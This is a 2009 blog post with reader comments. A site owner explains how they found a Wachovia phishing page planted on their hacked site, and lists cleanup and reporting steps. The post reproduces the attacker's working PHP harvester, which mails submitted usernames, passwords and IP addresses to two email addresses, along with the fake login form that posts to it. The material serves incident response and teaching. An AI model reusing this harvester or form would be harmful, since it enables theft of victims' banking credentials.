If your site has been compromised with phishing attack code…

March 17th, 2009 | Published in internet, legal, technology, web | Tags: attack, internet, phishing, php, scam, security, technology, tutorial, wachovia, web | 5 Comments

I recently recevied the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo. Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site. The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity. Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that’s how I knew that my site had been compromised by hackers and a phishing attack code had been injected into my site. If it has happened to you, do you know what is the right thing to do? How do you fix it? Well, here is what I did, and I think it is worthwhile to share this information so that it may be useful to others.. So here goes.

Step 1. Disable Your Site

First, disable your site, bring it down temporarily. The last thing you want is for more people to be scammed by a hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on unix/linux you can do a “chmod -R 000 <website-home-directory>” (Refer to the chmod tutorial here). For those using cpanel, go to the file manager and change the permissions of the document root for the website.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack. Now we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns=”http://www.w3.org/1999/xhtml”><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Now, with phishing, someone is trying to steal your username and password by impersonating some crediable website that needs your username and password to get into. In HTML, this is typically accomplished through ‘forms’, which starts with a `<form>’ tag in HTML. So I dug through the code and I saw two form tags.

The first one was:

<form method=”get” action=”http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?” name=”searchForm” onsubmit=”return verifyQuery(this.searchString);”>

…..

This looks fine because the ‘action’ parameter points to http://search.wachovia.com/selfservice…. which is a search script on the Wachovia website. So anyone filling you this form is sendin their data to the Wachovia website and the hacker will not get any information from it.

Now to the second form tag:

<form method=”post” action=”screen.php” name=”uidAuthForm” id=”uidAuthForm” onsubmit=”return submitLogin(this)”>

……

Aha! The smoking gun! Why? Well, look at the ‘action’ parameter in this ‘form’ tag, it says ’screen.php’ which is clearly not a script that is on the Wachovia servers, but something that is hosted on my website! So the hackers installed another script on my system to phish the username and passwords. Now I go see what’s inside this ’screen.php’ file that is located in the same directory as the ‘confirm.html’ file we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the ’screen.php’ file and this is what I find:

<?php

$ip = getenv(“REMOTE_ADDR”);
$datamasii=date(“D M d, Y g:i a”);
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = “Hello
userid : $userid
password : $password
——–0WN3d By Louis—————-
IP : $ip
DATE : $datamasii
“;

$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;
$subject = “Take What U need But Make Sure U Cash It Out !!!”;

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header(“Location: http://www.wachovia.com/helpcenter/0,,,00.html”);
?>

So here we are! Gotcha! Check out the line ‘$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;’ Clearly, the phishing attack was being carried out by the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities who can carry the investigation forward. And who are they? First, respond back to the email address that alerted you of this phishing attack (do a ‘reply all’ if there were multiple recipients/Cc’s to the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org to this email and just give them a copy of the phishing code (in this case it was the file ’screen.php’) and the offending email addresses you found.

As for now, that is all you can do, and just co-operate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files (by disabling their permission to ‘000′) and now that the code has been quarantined, you can bring your website up again by setting the permission back to as they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Now, note that the odds are that Google has already put a notice out against your site as a source of a phishing attack. So go to the following URL http://www.google.com/safebrowsing/report_error/ to let Google know that the problem has been taken care off and you site is safe again.

And that’s all you can do for the moment. Make sure your site is secure and you haven’t given permission to any of your directories to be writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game with hackers and like of you getting smarter and better than the other.

Responses

Feed | Trackback Address

Patrix says:

March 17th, 2009 at 11:22 am (#)

You’re lucky you were at least informed by Wachovia. How do we prevent them from inserting such malicious code in the first place?
Semantic Overload says:

March 17th, 2009 at 10:01 pm (#)

@patrix That’s a great question! Honestly, there is no foolproof mechanism to do that. Often, the CMS engines you use themselves have security vulnerabilities that are often exploited by hackers to insert such malicious code.
Having said that, there are mechanisms to mitigate the vulnerabilities, but they come with a price. For instance, you can give read-and-execute only permissions to all your files and directories. This ensures that the hackers don’t have the requisite permissions to install such code. But that means that you can’t upload images or do automatic upgrades from the front-end. So everytime you want to ‘write’ (or add or modify) any file to your website from the browser you will have to temporarily give write permissions to the necessary files and directories and then revert the permissions back after you are done.

So, in short, there is no guaranteed mechanism to prevent such attacks. Like I mentioned towards the end of this post: it’s a cat-and-mouse game that the CMS developers and website owners play with hackers, with each group trying to outdo the other. Sorry, I couldn’t be more helpful regarding this. Perhaps an expert on network and web security could provide a more insightful commmentery on it.
moonjungle says:

March 18th, 2009 at 1:35 am (#)

Hey man this definitely useful info.
Trish says:

October 18th, 2009 at 3:22 pm (#)

Thank you for your post, it was extremely helpful! This same exact issue just happened to me last week — Wachovia bank security aler. I am now unable to send my URL to anyone through email due to the phishing attack code now logged with my site. I know nothing about how you fixed it, but I will forward your link to my web people. I am still dealing with the clean-up. I now think that I have a trojan or some other kind of spyware on my Mac, as many “phishy” things continue to occur that make me suspicious. Thank you again.
Aneesh says:

January 13th, 2010 at 1:48 am (#)

step 1 : change FTP password
Step 2 : Download all files and clean
Step 3 : upload Files
Step 4 : Set 444 permission to all files, except Custom Upload folders

Remeber Do not save FTP password in your FTP client
If you suspects that your system is infected, Format and install OS, then install a good antivirus + firewall. I suggest Avast free edition and Comodo Firewall.

We have received many inquiries and we cleaned those infected sites. If your site is infected Please contact us

Best Regards,
Team HelloSystemadmin.com

Chronosynclastic Infundibulum